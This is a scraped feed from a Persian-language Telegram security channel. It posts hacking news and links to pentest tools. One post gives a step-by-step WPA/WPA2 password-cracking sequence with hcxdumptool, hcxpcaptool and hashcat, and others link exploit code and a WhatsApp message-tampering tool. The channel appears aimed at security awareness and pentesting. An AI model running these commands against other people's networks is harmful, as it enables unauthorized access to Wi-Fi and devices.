امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
پورت فورواردینگ در ویندوز با استفاده از پاورشل

https://github.com/deepzec/Win-PortFwd

#ps
#windows
#network

@sec_nerd
معادل دستور locate در ویندوز

#windows
#cmd


@sec_nerd
تهدید ضمنی حساب رسمی Infographic_ksa علیه کانادا با این هواپیما و برج تورنتو!
(در حال حاضر این توییت حذف شده است)

#politics
#911
#ksa


@sec_nerd
محققان امنیتی اعلام کردند بیش از ۲۱۰ هزار روتر میکروتیک با بدافزارهای ماینر آلوده شده اند.
این بدافزارها از آسیب پذیری موجود در winbox که در این لینک (https://github.com/BasuCert/WinboxPoC) موجود است برای نصب خود استفاده میکنند.
این آسیب پذیری به هکرها امکان دسترسی به دستگاه بدون نیاز به گذراندن مراحل احراز هویت را میدهد.


https://thehackernews.com/2018/08/mikrotik-router-hacking.html


#mikrotik
#network
#news
#cryptocurrency
#btc

@sec_nerd
قیمت خدمات هک و نفوذ در دارک وب بسیار ناچیز است!
این لیست شامل خدماتی مانند خرید نرم افزار با کارتهای دزدی، ساخت کی لاگر، بدافزار، تروجان و نرم افزار هک وایفای و ... است.
در لینک منبع میتوانید لیست قیمتها را بببینید اما برای مثال قیمت ساخت صفحه فیشینگ و کی لاگر نزدیک به ۲ دلار و بدافزار نزدیک به ۵۰ دلار است.


منبع:
https://www.hackread.com/hacking-tools-ready-made-phishing-pages-sold-on-dark-web/


#darknet
#hack
#news

@sec_nerd
این ابزار با استفاده از خروجی nmap سرویسها را بروت فورس میکند و قابلیت شناسایی پورتهای غیراستاندارد را نیز دارد.

https://github.com/x90skysn3k/brutespray

#nmap
#bruteforce
#medusa

@sec_nerd
شخصی سورس snapchat را بصورت عمومی منتشر کرد.
طبق درخواست یکی از مسئولان اسنپ، این سورس از گیت هاب حذف شده است.
https://github.com/github/dmca/commit/7f359b0798e924363ac16910514b1f0e5a9d6fa1

سورس اصلی در لینک زیر منتشر شده بود که در حال حاضر پیام کپی رایت گیت هاب در آن قرار داده شده است:
https://github.com/i5xx/Source-SnapChat/


تنها نتیجه جستجوی فایل مربوطه در گوگل به لینک زیر منتهی میشود:
https://uploadfiles.io/e513h


#snapchat
#news
#github


@sec_nerd
هک کردن WPA/WPA2 با استفاده از روش جدید حمله به WiFi

دریافت PMKID از دستگاه هدف با استفاده از ابزار https://github.com/ZerBea/hcxdumptool

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status


تبدیل فایل تولید شده به هش با استفاده از https://github.com/ZerBea/hcxtools

$ ./hcxpcaptool -z test.16800 test.pcapng

کرک کردن هش با استفاده از hashcat

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!

این مرحله بستگی به میزان پیچیدگی پسورد دارد



توضیحات بیشتر:
https://securityaffairs.co/wordpress/75170/hacking/hacking-wifi-wpa-wpa2.html


#wifi
#pentest
#network
#wpa2

@sec_nerd
امنیت اطلاعات
افزونه burp برای رمزگشایی ترافیک whatsapp https://github.com/romanzaikin/BurpExtension-WhatsApp-Decryption-CheckPoint #burpsuite #whatsapp @sec_nerd
در واتس اپ آسیب پذیریهایی کشف شده است که به کاربر اجازه میدهد که هر پیامی را در گفتگوهای خصوصی و عمومی تغییر دهد.
این مشکل به کاربر اجازه میدهد تا اخبار نادرست را در جایی که منبع قابل اعتمادی است منتشر کند.


این کار بوسیله افزونه معرفی شده در پست فوق قابل انجام است و در ویدیوی زیر میتوانید نحوه انجام آن را ببینید.

https://www.youtube.com/watch?v=rtSFaHPA0C4


منبع:
https://research.checkpoint.com/fakesapp-a-vulnerability-in-whatsapp/


#whatsapp
#privacy
#burpsuite


@sec_nerd
استفاده از فایلهای باینری در ویندوز که کاربردهای دوگانه دارند و بهره گیری از آنها در عملیات Post Exploitation (شاید عبارت پسانفوذ معادل یک کلمه ای خوبی برای این مورد باشه) به همراه فریمورک Koadic برای بالابردن سطح دسترسی در ویندوز و نفوذ به سایر سیستم های موجود در شبکه


https://blog.varonis.com/koadic-lol-malware-meets-python-based-command-and-control-c2-server-part-i/


#windows
#network
#privesc
#pivoting
#koadic
#mshta
#lolbin

@sec_nerd
نظر آبکی سایمون چوی،کارشناس سایبری اهل کره جنوبی که گفته بعد از توصیه روحانی به کره شمالی برای اعتماد نکردن به امریکا، هکرهای ایرانی در حال تقلید از هکرهای کره شمالی هستن!

#LOL
#fun

@sec_nerd
#js
#shit
#wtf

SELECT * From users!!!


@sec_nerd
هشدار دولت امریکا در خصوص حملات ادامه دار به زیرساختهای این کشور
بر اساس گزارش دپارتمان امنیت داخلی (معادل وزارت کشور میشه فکر میکنم) گروههای هکری روس به زیرساختهای حیاتی امریکا از جمله زیرساختهای انرژی نفوذ کرده اند و هنوز هم در حال هدف قراردادن این بخش هستند.
این حملات میتوانند پیامدهای ناگواری به همراه داشته باشند،‌ طوری که یک حمله علیه شبکه برق میتواند باعث خاموشی گسترده شود.
بر اساس نظر کارشناسان دولتی، هکرها حتی قادرند به شبکه های ایزوله شده (air gapped) نیز دست یابند.
بر اساس گزارش وال استریت ژورنال،‌هکرهای روس اذعان کردند که در یک عملیات طولانی مدت موفق به دستیابی به اتاقهای کنترل برق شدند که میتوانستند باعث بوجود آمدن خاموشی شوند.
گروه های هکری روس با استفاده از تکنیک های #spear_phishing اقدام به آلوده کردن تولیدکنندگان تجهیزات میکنند تا اطلاعات بدست آمده را برای نفوذ به زیرساختها مورد استفاده قرار دهند.
هکرها هدفشان از اینکار اکسپلویت کردن دسترسی های سازندگان تجهیزات به قسمتهای تله متری و تعمیر است و آنها را قادر میسازد که حتی بدافزارهای خود را در سیستم های زیرساختی اجرا کنند.



منبع:
https://securityaffairs.co/wordpress/74709/apt/russia-hack-critical-infrastructure-2.html


#usa
#russia
#dhs
#scada
#power_grid
#outage
#news


@sec_nerd